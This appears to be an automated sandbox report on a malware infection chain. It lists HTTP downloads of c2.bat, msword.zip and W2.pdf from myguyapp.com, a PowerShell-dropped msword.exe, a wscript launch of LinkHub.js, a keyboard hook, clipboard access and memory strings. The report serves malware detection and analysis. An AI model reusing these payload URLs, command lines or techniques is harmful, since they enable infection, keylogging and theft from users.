Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C2D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

38_2_00C2D889

Source: global traffic	HTTP traffic detected: GET /c2.bat HTTP/1.1Accept: /Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /W2.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: myguyapp.com
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF
Source: global traffic	DNS traffic detected: DNS query: me-work.com
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: msword.exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: msword.exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: msword.exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: msword.exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: msword.exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: msword.exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: msword.exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: msword.exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: msword.exe.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: msword.exe, 0000000F.00000000.2007838573.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.11.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msword.exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: msword.exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: msword.exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: msword.exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001E.00000000.2060650659.00000000003B5000.00000002.00000001.01000000.0000000F.sdmp, LinkHub.com, 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmp, LinkHub.com, 00000028.00000002.2209734744.0000000000C85000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: msword.exe.11.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mshta.exe, 00000000.00000002.2017009413.000000000532C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008561227.000000000532C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000000.00000002.2018361418.00000000061F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapcom/c2.bat
Source: mshta.exe, 00000000.00000002.2015583757.0000000000800000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009182730.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645772502.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645919900.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2012317613.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.c(-3378
Source: mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.co4)&ch
Source: mshta.exe, 00000000.00000002.2015583757.0000000000800000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009182730.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645772502.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645919900.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2012317613.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.co4)&chvv
Source: mshta.exe, 00000000.00000002.2017009413.000000000532C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008561227.000000000532C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/
Source: mshta.exe, 00000000.00000002.2017009413.000000000532C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008561227.000000000532C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/J
Source: mshta.exe, 00000000.00000003.2013885833.000000000B350000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009182730.000000000080A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009182730.000000000082B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2015674682.0000000000834000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009746330.0000000000833000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2028885332.0000000002290000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2028276844.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2028219097.0000000000690000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2042717140.000000000054B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2043420567.0000000000518000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2043123562.000000000054B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2043552243.000000000054B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2043769990.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2051554861.0000000002F90000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2051641791.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2051505416.0000000002F8E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2052204852.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2052020268.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2052105236.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 0000001A.00000002.2057161119.0000000002840000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 0000001A.00000002.2057409015.0000000002938000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdf
Source: msword.exe, 0000000F.00000002.2028276844.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdf/
Source: extrac32.exe, 0000001A.00000002.2057409015.0000000002938000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfy
Source: mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c
Source: mshta.exe, 00000000.00000002.2017871072.0000000005FF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2
Source: mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.
Source: mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.S
Source: mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.b))&chr(
Source: mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.ba10
Source: mshta.exe, 00000000.00000003.1645772502.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1642654795.000000000678D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1643459320.0000000006251000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2017009413.0000000005324000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1642779155.00000000065FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1642814475.0000000006577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1643321974.000000000632A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2012744974.00000000007C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1643125601.000000000641A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644434753.00000000053DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644271485.0000000005FF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008561227.00000000052FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1642857735.000000000663D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644572837.0000000005364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644523625.0000000005369000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644434753.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1642704929.0000000006708000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645506633.00000000053DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009138600.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1643247572.00000000063F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1643672730.00000000061C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.bat
Source: mshta.exe, 00000000.00000003.1643719555.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1643769959.0000000005D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.bat8
Source: mshta.exe, 00000000.00000002.2022225749.00000000067CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009138600.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008889087.00000000067B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.batG0)
Source: mshta.exe, 00000000.00000003.1656744257.000000000085B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008927810.000000000085D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2015870772.0000000000860000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.batrg
Source: mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2H
Source: mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645772502.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645919900.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/g(
Source: extrac32.exe, 0000001A.00000002.2057409015.0000000002938000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001F.00000002.2113414928.0000000000988000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001F.00000002.2113673031.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000020.00000002.2068283836.0000000003010000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000020.00000002.2069014706.00000000032C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.2076250703.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.2076706900.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip
Source: tasklist.exe, 00000015.00000002.2043420567.0000000000518000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip6
Source: tasklist.exe, 00000015.00000003.2042717140.000000000054B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2043123562.000000000054B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2043552243.000000000054B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipHL
Source: tasklist.exe, 00000017.00000002.2052105236.0000000002F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipTJ
Source: tasklist.exe, 00000017.00000003.2051554861.0000000002F90000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2051641791.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2051505416.0000000002F8E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2052204852.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipV
Source: Propose.com, 0000001E.00000003.2068166275.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066787736.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066826334.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2068127580.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066809263.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2068098727.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066914870.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066748792.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066863454.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066769328.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066843995.00000000014D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf
Source: cmd.exe, 00000023.00000002.2076250703.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.2076706900.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP
Source: mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.comH14f
Source: mshta.exe, 00000000.00000003.1645772502.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645919900.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.comH14f;;
Source: Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49736 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

15_2_004050CD

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C2F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

38_2_00C2F7C7

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C2F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

38_2_00C2F55C

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

15_2_004044A5

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C49FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

38_2_00C49FD2

System Summary

Drops large PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File dump: msword.exe.11.dr 597698952

Jump to dropped file

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C24763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

38_2_00C24763

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C11B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

38_2_00C11B4D

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		15_2_00403883
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C1F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		38_2_00C1F20D

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\EquationsHighlights
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\OurProperty
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\ItemAnytime
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\ExpenditureBlood
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\DentalSubtle

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_0040497C	15_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406ED2	15_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_004074BB	15_2_004074BB
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD8017	38_2_00BD8017
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BBE1F0	38_2_00BBE1F0
